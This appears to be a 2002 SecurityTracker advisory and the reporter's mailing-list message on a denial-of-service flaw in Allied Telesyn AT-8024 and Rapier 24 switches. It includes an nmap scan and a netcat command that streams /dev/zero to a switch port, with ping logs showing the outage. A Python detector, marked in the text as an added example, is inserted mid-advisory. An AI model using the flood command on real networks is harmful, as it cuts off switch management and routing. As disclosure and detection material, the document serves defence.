Allied Telesyn Switch Management Ports Allow Remote Users to Deny Service to Those Ports
SecurityTracker Alert ID: 1005694
CVE Reference: GENERIC-MAP-NOMATCH
Date: Nov 25 2002
Impact: Denial of service via network
Exploit Included: Yes
Version(s): AT-8024, Rapier 24
Description: A denial of service vulnerability was reported in the Allied Telesyn AT-8024 and Rapier 24 Ethernet switches. A remote user can cause the management ports to temporarily stop responding to traffic.
A remote user can reportedly send a data stream from /dev/zero (\0 characters) to an open port on the switch or, in the case of the AT-8024 switch, to any port to cause the device to stop responding to that port.
A demonstration exploit command using the netcat tool is provided:
cat /dev/zero | nc -u 192.168.0.13 Open_Port &
Impact: A remote user can cause the management port to stop responding.
Solution: No solution was available at the time of this entry.
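With no fix listed, the traffic pattern described above can be watched for on the network. The following is an added example, not part of the advisory or of any vendor tooling: it flags sources that deliver a sustained volume of all-\0 payload to a switch management address. The record layout, thresholds and source addresses are constructed assumptions; 192.168.0.13 and port 6789 are taken from the report.

```python
from collections import defaultdict

# Assumptions (not from the advisory): record layout and thresholds are illustrative.
MGMT_ADDRS = {"192.168.0.13"}  # switch address used in the advisory's example
WINDOW_S = 1.0                 # tumbling window length, seconds
MIN_NULL_BYTES = 4096          # all-\0 payload bytes per window that raise an alert


def is_null_payload(payload: bytes) -> bool:
    """True for a non-empty payload consisting only of \\0 bytes."""
    return len(payload) > 0 and payload.count(0) == len(payload)


def find_null_floods(packets, mgmt=MGMT_ADDRS, window=WINDOW_S, threshold=MIN_NULL_BYTES):
    """Alert on flows delivering >= threshold null bytes to a management address
    within one window. Every destination port is counted, because the advisory
    says the AT-8024 is affected on any port."""
    totals = defaultdict(int)
    for ts, src, dst, dport, proto, payload in packets:
        if dst in mgmt and is_null_payload(payload):
            totals[(src, dst, dport, proto, int(ts // window))] += len(payload)
    alerts = [
        {"src": s, "dst": d, "dport": p, "proto": pr,
         "window_start": b * window, "null_bytes": n}
        for (s, d, p, pr, b), n in totals.items() if n >= threshold
    ]
    return sorted(alerts, key=lambda a: (a["window_start"], a["src"], a["dport"]))


def sample_packets():
    """Constructed capture records: (ts, src, dst, dport, proto, payload)."""
    flood = [(10.0 + i * 0.1, "192.168.0.50", "192.168.0.13", 6789, "udp", b"\x00" * 1024)
             for i in range(8)]
    other = [
        (10.2, "192.168.0.20", "192.168.0.13", 161, "udp", b"\x30\x26\x02\x01\x00"),  # mixed bytes
        (10.3, "192.168.0.21", "192.168.0.13", 23, "tcp", b"\x00" * 16),   # under threshold
        (10.4, "192.168.0.50", "192.168.0.99", 6789, "udp", b"\x00" * 8192),  # not a management address
    ]
    return flood + other


if __name__ == "__main__":
    for alert in find_null_floods(sample_packets()):
        print(alert)
```

The same per-flow counters can feed a rate limit or ACL on the management VLAN, so that only designated admin hosts can reach the switch address at all.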
Vendor URL: www.alliedtelesyn.com/allied/products/viewproduct.asp?id=552
Cause: Exception handling error
Reported By: "Oleg A. Lebedev" <techdir@mns.ru>
Message History: None.

Source Message Contents
Date: Wed, 20 Nov 2002 17:13:04 +0300
From: "Oleg A. Lebedev" <techdir@mns.ru>
Subject: Allied Telesyn switches & routers vulnerability
Hello, all
The problem: Zero stream DoS switch!
We have tested Allied Telesyn switches, the 8024 and Rapier24. We have
installed the latest firmware from the AT site.
Testing:
1. Scan for open ports on switch (assume switch address 192.168.0.13):
nmap -v -sT 192.168.0.13
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Host (192.168.0.103) appears to be up ... good.
Initiating Connect() Scan against (192.168.0.103)
Adding TCP port 23 (state open).
Adding TCP port 80 (state open).
The Connect() Scan took 4 seconds to scan 1542 ports.
Interesting ports on (192.168.0.103):
(The 1540 ports scanned but not shown below are in state: closed)
Port State Service
23/tcp open telnet
80/tcp open http
Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
2. Send a stream of zeros to an open port, or to any port in the case of the 8024:
cat /dev/zero | nc -u 192.168.0.13 Open_Port &
Pinging 192.168.0.103 with 32 bytes of data:
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time=16ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Request timed out. // Start sending zero stream: cat /dev/zero | nc -u 192.168.0.103 6789
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out. // Stop sending zero stream
Reply from 192.168.0.103: bytes=32 time=203ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
So, in the case of the 8024, it stops responding on the management interface, and in
the case of the Rapier24, it stops management interface access and routing also.
The bug was reported to Allied Telesyn in July...
Best Regards, Oleg A. Lebedev
"Matrix Network Solutions" CIO